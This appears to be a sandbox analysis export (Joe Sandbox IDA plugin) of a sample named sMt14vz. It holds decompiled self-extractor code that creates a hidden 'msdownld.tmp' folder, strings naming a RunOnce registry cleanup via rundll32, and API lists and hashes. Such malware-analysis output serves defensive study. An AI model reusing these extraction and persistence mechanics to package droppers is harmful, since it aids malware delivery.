                                                                                                                                                                                                                                            • String ID: %s /D:%s$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                                                            • API String ID: 178549006-4264933467
                                                                                                                                                                                                                                            • Opcode ID: 5223cf364f92c69e55e00bcb9848098562d76c52a97c67dbcbf0c9afb6d96d68
                                                                                                                                                                                                                                            • Instruction ID: 8d1a3d47011323622309a21cf03de7f05142ac7ffcb73a483c0e2085f8f52de0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5223cf364f92c69e55e00bcb9848098562d76c52a97c67dbcbf0c9afb6d96d68
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6851F179A01314ABDB309B74DC48FFA7B7CEB50700F0081A9FEC9E7145DA769A858B60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 232 10d55a0-10d55d9 call 10d468f LocalAlloc 235 10d55fd-10d560c call 10d468f 232->235 236 10d55db-10d55f1 call 10d44b9 call 10d6285 232->236 241 10d560e-10d5630 call 10d44b9 LocalFree 235->241 242 10d5632-10d5643 lstrcmpA 235->242 251 10d55f6-10d55f8 236->251 241->251 245 10d564b-10d5659 LocalFree 242->245 246 10d5645 242->246 249 10d565b-10d565d 245->249 250 10d5696-10d569c 245->250 246->245 254 10d565f-10d5667 249->254 255 10d5669 249->255 252 10d589f-10d58b5 call 10d6517 250->252 253 10d56a2-10d56a8 250->253 256 10d58b7-10d58c7 call 10d6ce0 251->256 252->256 253->252 257 10d56ae-10d56c1 GetTempPathA 253->257 254->255 258 10d566b-10d567a call 10d5467 254->258 255->258 262 10d56f3-10d5711 call 10d1781 257->262 263 10d56c3-10d56c9 call 10d5467 257->263 270 10d589b-10d589d 258->270 271 10d5680-10d5691 call 10d44b9 258->271 275 10d586c-10d5890 GetWindowsDirectoryA call 10d597d 262->275 276 10d5717-10d5729 GetDriveTypeA 262->276 269 10d56ce-10d56d0 263->269 269->270 273 10d56d6-10d56df call 10d2630 269->273 270->256 271->251 273->262 288 10d56e1-10d56ed call 10d5467 273->288 275->262 289 10d5896 275->289 280 10d572b-10d572e 276->280 281 10d5730-10d5740 GetFileAttributesA 276->281 280->281 282 10d5742-10d5745 280->282 281->282 283 10d577e-10d578f call 10d597d 281->283 286 10d576b 282->286 287 10d5747-10d574f 282->287 298 10d5791-10d579e call 10d2630 283->298 299 10d57b2-10d57bf call 10d2630 283->299 291 10d5771-10d5779 286->291 287->291 292 10d5751-10d5753 287->292 288->262 288->270 289->270 296 10d5864-10d5866 291->296 292->291 295 10d5755-10d5762 call 10d6952 292->295 295->286 309 10d5764-10d5769 295->309 296->275 296->276 298->286 306 10d57a0-10d57b0 call 10d597d 298->306 307 10d57c1-10d57cd GetWindowsDirectoryA 
299->307 308 10d57d3-10d57f8 call 10d658a GetFileAttributesA 299->308 306->286 306->299 307->308 314 10d580a 308->314 315 10d57fa-10d5808 CreateDirectoryA 308->315 309->283 309->286 316 10d580d-10d580f 314->316 315->316 317 10d5827-10d585c SetFileAttributesA call 10d1781 call 10d5467 316->317 318 10d5811-10d5825 316->318 317->270 323 10d585e 317->323 318->296 323->296
                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E010D55A0(void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v265;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t35;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                                            				long _t48;
                                                                                                                                                                                                                                            				int _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				char _t60;
                                                                                                                                                                                                                                            				int _t65;
                                                                                                                                                                                                                                            				char _t66;
                                                                                                                                                                                                                                            				int _t67;
                                                                                                                                                                                                                                            				int _t68;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				int _t70;
                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                            				int _t73;
                                                                                                                                                                                                                                            				CHAR* _t82;
                                                                                                                                                                                                                                            				CHAR* _t88;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                            				_t2 = E010D468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                            				if(_t109 != 0) {
                                                                                                                                                                                                                                            					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                            					_t32 = E010D468F(_t82, _t109, 1);
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                            						__eflags = _t33;
                                                                                                                                                                                                                                            						if(_t33 == 0) {
                                                                                                                                                                                                                                            							 *0x10d9a30 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						_t35 =  *0x10d8b3e; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t35;
                                                                                                                                                                                                                                            						if(_t35 == 0) {
                                                                                                                                                                                                                                            							__eflags =  *0x10d8a24; // 0x0
                                                                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                                                                            								L46:
                                                                                                                                                                                                                                            								_t101 = 0x7d2;
                                                                                                                                                                                                                                            								_t36 = E010D6517(_t82, 0x7d2, 0, E010D3210, 0, 0);
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0x10d9a30;
                                                                                                                                                                                                                                            								if( *0x10d9a30 != 0) {
                                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t109 = 0x10d91e4;
                                                                                                                                                                                                                                            									_t40 = GetTempPathA(0x104, 0x10d91e4);
                                                                                                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                                                                                                            										L19:
                                                                                                                                                                                                                                            										_push(_t82);
                                                                                                                                                                                                                                            										E010D1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                            										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                            										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                            											do {
                                                                                                                                                                                                                                            												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                            												__eflags = _t109 - 6;
                                                                                                                                                                                                                                            												if(_t109 == 6) {
                                                                                                                                                                                                                                            													L22:
                                                                                                                                                                                                                                            													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                            													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L23;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													__eflags = _t109 - 3;
                                                                                                                                                                                                                                            													if(_t109 != 3) {
                                                                                                                                                                                                                                            														L23:
                                                                                                                                                                                                                                            														__eflags = _t109 - 2;
                                                                                                                                                                                                                                            														if(_t109 != 2) {
                                                                                                                                                                                                                                            															L28:
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															goto L29;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                            															if(_t66 == 0x41) {
                                                                                                                                                                                                                                            																L29:
                                                                                                                                                                                                                                            																_t60 = _t66 + 1;
                                                                                                                                                                                                                                            																_v268 = _t60;
                                                                                                                                                                                                                                            																goto L42;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                            																if(_t66 == 0x42) {
                                                                                                                                                                                                                                            																	goto L29;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t68 = E010D6952( &_v268);
                                                                                                                                                                                                                                            																	__eflags = _t68;
                                                                                                                                                                                                                                            																	if(_t68 == 0) {
                                                                                                                                                                                                                                            																		goto L28;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                            																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                            																			L30:
                                                                                                                                                                                                                                            																			_push(0);
                                                                                                                                                                                                                                            																			_t103 = 3;
                                                                                                                                                                                                                                            																			_t49 = E010D597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                            																			__eflags = _t49;
                                                                                                                                                                                                                                            																			if(_t49 != 0) {
                                                                                                                                                                                                                                            																				L33:
                                                                                                                                                                                                                                            																				_t50 = E010D2630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t50;
                                                                                                                                                                                                                                            																				if(_t50 != 0) {
                                                                                                                                                                                                                                            																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t88 =  &_v268;
                                                                                                                                                                                                                                            																				E010D658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                            																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                            																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                            																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                            																					__eflags = _t54;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				__eflags = _t54;
                                                                                                                                                                                                                                            																				if(_t54 != 0) {
                                                                                                                                                                                                                                            																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                            																					_push(_t88);
                                                                                                                                                                                                                                            																					_t109 = 0x10d91e4;
                                                                                                                                                                                                                                            																					E010D1781(0x10d91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                            																					_t101 = 1;
                                                                                                                                                                                                                                            																					_t59 = E010D5467(0x10d91e4, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t59;
                                                                                                                                                                                                                                            																					if(_t59 != 0) {
                                                                                                                                                                                                                                            																						goto L45;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t60 = _v268;
                                                                                                                                                                                                                                            																						goto L42;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                            																					_v265 = 0;
                                                                                                                                                                                                                                            																					_v268 = _t60;
                                                                                                                                                                                                                                            																					goto L42;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				_t65 = E010D2630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t65;
                                                                                                                                                                                                                                            																				if(_t65 != 0) {
                                                                                                                                                                                                                                            																					goto L28;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t67 = E010D597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t67;
                                                                                                                                                                                                                                            																					if(_t67 == 0) {
                                                                                                                                                                                                                                            																						goto L28;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						goto L33;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			goto L28;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L22;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L47;
                                                                                                                                                                                                                                            												L42:
                                                                                                                                                                                                                                            												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                            											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t101 = 1;
                                                                                                                                                                                                                                            										_t69 = E010D5467(0x10d91e4, 1, 3); // executed
                                                                                                                                                                                                                                            										__eflags = _t69;
                                                                                                                                                                                                                                            										if(_t69 != 0) {
                                                                                                                                                                                                                                            											goto L45;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t82 = 0x10d91e4;
                                                                                                                                                                                                                                            											_t70 = E010D2630(0, 0x10d91e4, 1);
                                                                                                                                                                                                                                            											__eflags = _t70;
                                                                                                                                                                                                                                            											if(_t70 != 0) {
                                                                                                                                                                                                                                            												goto L19;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t101 = 1;
                                                                                                                                                                                                                                            												_t82 = 0x10d91e4;
                                                                                                                                                                                                                                            												_t71 = E010D5467(0x10d91e4, 1, 1);
                                                                                                                                                                                                                                            												__eflags = _t71;
                                                                                                                                                                                                                                            												if(_t71 != 0) {
                                                                                                                                                                                                                                            													goto L45;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													do {
                                                                                                                                                                                                                                            														goto L19;
                                                                                                                                                                                                                                            														L43:
                                                                                                                                                                                                                                            														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            														_push(4);
                                                                                                                                                                                                                                            														_t101 = 3;
                                                                                                                                                                                                                                            														_t82 =  &_v268;
                                                                                                                                                                                                                                            														_t44 = E010D597D(_t82, _t101, 1);
                                                                                                                                                                                                                                            														__eflags = _t44;
                                                                                                                                                                                                                                            													} while (_t44 != 0);
                                                                                                                                                                                                                                            													goto L2;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                            							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								_t72 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0x10d8b3f - _t35; // 0x0
                                                                                                                                                                                                                                            								_t72 = 0;
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L10;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t101 = 0;
                                                                                                                                                                                                                                            							_t73 = E010D5467(0x10d8b3e, 0, _t72);
                                                                                                                                                                                                                                            							__eflags = _t73;
                                                                                                                                                                                                                                            							if(_t73 != 0) {
                                                                                                                                                                                                                                            								L45:
                                                                                                                                                                                                                                            								_t38 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t101 = 0x4be;
                                                                                                                                                                                                                                            								E010D44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L2;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t101 = 0x4b1;
                                                                                                                                                                                                                                            						E010D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						 *0x10d9124 = 0x80070714;
                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t101 = 0x4b5;
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					_t38 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L47:
                                                                                                                                                                                                                                            				return E010D6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                                            0x010d574d
                                                                                                                                                                                                                                            0x010d574f
                                                                                                                                                                                                                                            0x010d5771
                                                                                                                                                                                                                                            0x010d5771
                                                                                                                                                                                                                                            0x010d5773
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5751
                                                                                                                                                                                                                                            0x010d5751
                                                                                                                                                                                                                                            0x010d5753
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5755
                                                                                                                                                                                                                                            0x010d575b
                                                                                                                                                                                                                                            0x010d5760
                                                                                                                                                                                                                                            0x010d5762
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5764
                                                                                                                                                                                                                                            0x010d5764
                                                                                                                                                                                                                                            0x010d5769
                                                                                                                                                                                                                                            0x010d577e
                                                                                                                                                                                                                                            0x010d577e
                                                                                                                                                                                                                                            0x010d5781
                                                                                                                                                                                                                                            0x010d5788
                                                                                                                                                                                                                                            0x010d578d
                                                                                                                                                                                                                                            0x010d578f
                                                                                                                                                                                                                                            0x010d57b2
                                                                                                                                                                                                                                            0x010d57b8
                                                                                                                                                                                                                                            0x010d57bd
                                                                                                                                                                                                                                            0x010d57bf
                                                                                                                                                                                                                                            0x010d57cd
                                                                                                                                                                                                                                            0x010d57cd
                                                                                                                                                                                                                                            0x010d57dd
                                                                                                                                                                                                                                            0x010d57e3
                                                                                                                                                                                                                                            0x010d57ef
                                                                                                                                                                                                                                            0x010d57f5
                                                                                                                                                                                                                                            0x010d57f8
                                                                                                                                                                                                                                            0x010d580a
                                                                                                                                                                                                                                            0x010d580a
                                                                                                                                                                                                                                            0x010d57fa
                                                                                                                                                                                                                                            0x010d5802
                                                                                                                                                                                                                                            0x010d5802
                                                                                                                                                                                                                                            0x010d580d
                                                                                                                                                                                                                                            0x010d580f
                                                                                                                                                                                                                                            0x010d5830
                                                                                                                                                                                                                                            0x010d5836
                                                                                                                                                                                                                                            0x010d583d
                                                                                                                                                                                                                                            0x010d584b
                                                                                                                                                                                                                                            0x010d5851
                                                                                                                                                                                                                                            0x010d5855
                                                                                                                                                                                                                                            0x010d585a
                                                                                                                                                                                                                                            0x010d585c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d585e
                                                                                                                                                                                                                                            0x010d585e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d585e
                                                                                                                                                                                                                                            0x010d5811
                                                                                                                                                                                                                                            0x010d5817
                                                                                                                                                                                                                                            0x010d5819
                                                                                                                                                                                                                                            0x010d581f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d581f
                                                                                                                                                                                                                                            0x010d5791
                                                                                                                                                                                                                                            0x010d5797
                                                                                                                                                                                                                                            0x010d579c
                                                                                                                                                                                                                                            0x010d579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d57a0
                                                                                                                                                                                                                                            0x010d57a9
                                                                                                                                                                                                                                            0x010d57ae
                                                                                                                                                                                                                                            0x010d57b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d57b0
                                                                                                                                                                                                                                            0x010d579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5769
                                                                                                                                                                                                                                            0x010d5762
                                                                                                                                                                                                                                            0x010d5753
                                                                                                                                                                                                                                            0x010d574f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d572e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5864
                                                                                                                                                                                                                                            0x010d5864
                                                                                                                                                                                                                                            0x010d5864
                                                                                                                                                                                                                                            0x010d5717
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d56c3
                                                                                                                                                                                                                                            0x010d56c5
                                                                                                                                                                                                                                            0x010d56c9
                                                                                                                                                                                                                                            0x010d56ce
                                                                                                                                                                                                                                            0x010d56d0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d56d6
                                                                                                                                                                                                                                            0x010d56d6
                                                                                                                                                                                                                                            0x010d56d8
                                                                                                                                                                                                                                            0x010d56dd
                                                                                                                                                                                                                                            0x010d56df
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d56e1
                                                                                                                                                                                                                                            0x010d56e2
                                                                                                                                                                                                                                            0x010d56e4
                                                                                                                                                                                                                                            0x010d56e6
                                                                                                                                                                                                                                            0x010d56eb
                                                                                                                                                                                                                                            0x010d56ed
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010D55CF
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 010D5638
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 010D564C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010D5620
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                              • Part of subcall function 010D6285: GetLastError.KERNEL32(010D5BBC), ref: 010D6285
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,010D91E4), ref: 010D56B9
                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 010D571E
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 010D5737
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010D57CD
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010D57EF
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 010D5802
                                                                                                                                                                                                                                              • Part of subcall function 010D2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 010D2654
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 010D5830
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: FindResourceA.KERNEL32(?,000007D6,00000005), ref: 010D652A
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: LoadResource.KERNEL32(?,00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010D6538
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: DialogBoxIndirectParamA.USER32(?,00000000,00000547,010D19E0,00000000), ref: 010D6557
                                                                                                                                                                                                                                              • Part of subcall function 010D6517: FreeResource.KERNEL32(00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010D6560
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 010D5878
                                                                                                                                                                                                                                              • Part of subcall function 010D597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010D59A8
                                                                                                                                                                                                                                              • Part of subcall function 010D597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010D59AF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$A:\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                            • API String ID: 2436801531-4006054585
                                                                                                                                                                                                                                            • Opcode ID: 3eeb5d2ada5afd09c562fbbc0b08c9e67238ab709f82aa51afae2931c76cca81
                                                                                                                                                                                                                                            • Instruction ID: b5e51a2693d29ccb0a445e1d2ad9fff9d3cfed90477a5a322974a52b8eba9b6e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3eeb5d2ada5afd09c562fbbc0b08c9e67238ab709f82aa51afae2931c76cca81
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 638114B0B043159AEB71AA78AC84BFE76BDAF65340F0400E5EDC6E3185EE758DC18B50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
